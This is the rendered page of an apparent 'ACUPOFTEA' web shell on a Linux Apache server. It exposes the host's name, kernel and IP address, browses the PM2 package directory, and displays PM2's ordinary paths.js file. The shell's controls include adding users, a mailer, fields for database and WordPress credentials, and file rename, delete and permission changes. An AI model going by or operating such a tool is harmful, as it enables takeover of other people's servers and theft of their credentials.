System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
node_modules
/
pm2
/
216.73.216.168
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
paths.js
/** * Copyright 2013-2022 the PM2 project authors. All rights reserved. * Use of this source code is governed by a license that * can be found in the LICENSE file. */ var debug = require('debug')('pm2:paths'); var p = require('path'); var fs = require('fs') function getDefaultPM2Home() { var PM2_ROOT_PATH; if (process.env.PM2_HOME) PM2_ROOT_PATH = process.env.PM2_HOME; else if (process.env.HOME && !process.env.HOMEPATH) PM2_ROOT_PATH = p.resolve(process.env.HOME, '.pm2'); else if (process.env.HOME || process.env.HOMEPATH) PM2_ROOT_PATH = p.resolve(process.env.HOMEDRIVE, process.env.HOME || process.env.HOMEPATH, '.pm2'); else { console.error('[PM2][Initialization] Environment variable HOME (Linux) or HOMEPATH (Windows) are not set!'); console.error('[PM2][Initialization] Defaulting to /etc/.pm2'); PM2_ROOT_PATH = p.resolve('/etc', '.pm2'); } debug('pm2 home resolved to %s', PM2_ROOT_PATH, process.env.HOME); return PM2_ROOT_PATH; } module.exports = function(PM2_HOME) { var has_node_embedded = false if (fs.existsSync(p.resolve(__dirname, './node')) === true) { has_node_embedded = true } if (!PM2_HOME) { PM2_HOME = getDefaultPM2Home() } var pm2_file_stucture = { PM2_HOME : PM2_HOME, PM2_ROOT_PATH : PM2_HOME, PM2_CONF_FILE : p.resolve(PM2_HOME, 'conf.js'), PM2_MODULE_CONF_FILE : p.resolve(PM2_HOME, 'module_conf.json'), PM2_LOG_FILE_PATH : p.resolve(PM2_HOME, 'pm2.log'), PM2_PID_FILE_PATH : p.resolve(PM2_HOME, 'pm2.pid'), PM2_RELOAD_LOCKFILE : p.resolve(PM2_HOME, 'reload.lock'), DEFAULT_PID_PATH : p.resolve(PM2_HOME, 'pids'), DEFAULT_LOG_PATH : p.resolve(PM2_HOME, 'logs'), DEFAULT_MODULE_PATH : p.resolve(PM2_HOME, 'modules'), PM2_IO_ACCESS_TOKEN : p.resolve(PM2_HOME, 'pm2-io-token'), DUMP_FILE_PATH : p.resolve(PM2_HOME, 'dump.pm2'), DUMP_BACKUP_FILE_PATH : p.resolve(PM2_HOME, 'dump.pm2.bak'), DAEMON_RPC_PORT : p.resolve(PM2_HOME, 'rpc.sock'), DAEMON_PUB_PORT : p.resolve(PM2_HOME, 'pub.sock'), INTERACTOR_RPC_PORT : p.resolve(PM2_HOME, 'interactor.sock'), INTERACTOR_LOG_FILE_PATH : p.resolve(PM2_HOME, 'agent.log'), INTERACTOR_PID_PATH : p.resolve(PM2_HOME, 'agent.pid'), INTERACTION_CONF : p.resolve(PM2_HOME, 'agent.json5'), HAS_NODE_EMBEDDED : has_node_embedded, BUILTIN_NODE_PATH : has_node_embedded === true ? p.resolve(__dirname, './node/bin/node') : null, BUILTIN_NPM_PATH : has_node_embedded === true ? p.resolve(__dirname, './node/bin/npm') : null, }; // allow overide of file paths via environnement var paths = Object.keys(pm2_file_stucture); paths.forEach(function (key) { var envKey = key.indexOf('PM2_') > -1 ? key : 'PM2_' + key; if (process.env[envKey] && key !== 'PM2_HOME' && key !== 'PM2_ROOT_PATH') { pm2_file_stucture[key] = process.env[envKey]; } }); if (process.platform === 'win32' || process.platform === 'win64') { //@todo instead of static unique rpc/pub file custom with PM2_HOME or UID pm2_file_stucture.DAEMON_RPC_PORT = '\\\\.\\pipe\\rpc.sock'; pm2_file_stucture.DAEMON_PUB_PORT = '\\\\.\\pipe\\pub.sock'; pm2_file_stucture.INTERACTOR_RPC_PORT = '\\\\.\\pipe\\interactor.sock'; } return pm2_file_stucture; };
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-01-20 04:24:47
..
DIR
-
drwxr-xr-x
2026-03-05 10:57:26
bin
DIR
-
drwxr-xr-x
2026-01-20 04:24:47
lib
DIR
-
drwxr-xr-x
2026-01-20 04:24:47
node_modules
DIR
-
drwxr-xr-x
2026-01-20 04:24:47
types
DIR
-
drwxr-xr-x
2026-01-20 04:24:47
.gitattributes
text/plain
62 B
-rw-r--r--
2026-01-20 04:24:46
.mocharc.js
text/plain
216 B
-rw-r--r--
2026-01-20 04:24:46
CHANGELOG.md
text/plain
101.42 KB
-rw-r--r--
2026-01-20 04:24:47
CONTRIBUTING.md
text/plain
2.78 KB
-rw-r--r--
2026-01-20 04:24:47
GNU-AGPL-3.0.txt
text/plain
33.71 KB
-rw-r--r--
2026-01-20 04:24:47
LICENSE
text/plain
17 B
-rw-r--r--
2026-01-20 04:24:46
README.md
text/html
6.31 KB
-rw-r--r--
2026-01-20 04:24:47
bun.lock
text/plain
18.62 KB
-rw-r--r--
2026-01-20 04:24:47
constants.js
text/plain
4.98 KB
-rw-r--r--
2026-01-20 04:24:47
e2e_time
text/plain
496 B
-rw-r--r--
2026-01-20 04:24:46
index.js
text/plain
303 B
-rw-r--r--
2026-01-20 04:24:47
package.json
text/plain
4.43 KB
-rw-r--r--
2026-01-20 04:24:47
paths.js
text/plain
3.38 KB
-rw-r--r--
2026-01-20 04:24:47
pm2
text/x-shellscript
220 B
-rwxr-xr-x
2026-01-20 04:24:46
preinstall.js
text/plain
689 B
-rw-r--r--
2026-01-20 04:24:47
run.sh
text/x-shellscript
136 B
-rw-r--r--
2026-01-20 04:24:47
unit_time
text/plain
2.42 KB
-rw-r--r--
2026-01-20 04:24:46
~ ACUPOFTEA - mail.ontime-ae.com